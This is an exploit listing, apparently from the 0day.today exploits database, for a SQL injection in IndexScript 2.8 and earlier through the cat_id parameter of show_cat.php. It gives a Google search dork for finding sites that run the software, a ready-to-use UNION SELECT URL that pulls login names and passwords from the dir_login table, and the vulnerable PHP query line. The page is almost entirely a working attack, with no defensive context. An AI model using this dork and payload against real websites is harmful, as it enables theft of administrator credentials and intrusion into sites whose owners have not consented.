[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability

Author
xssvgamer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2049
Category
web applications
Date add
24-07-2007
Platform
unsorted
====================================================================
IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
====================================================================



Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"



#  0day.today [2024-12-24]  #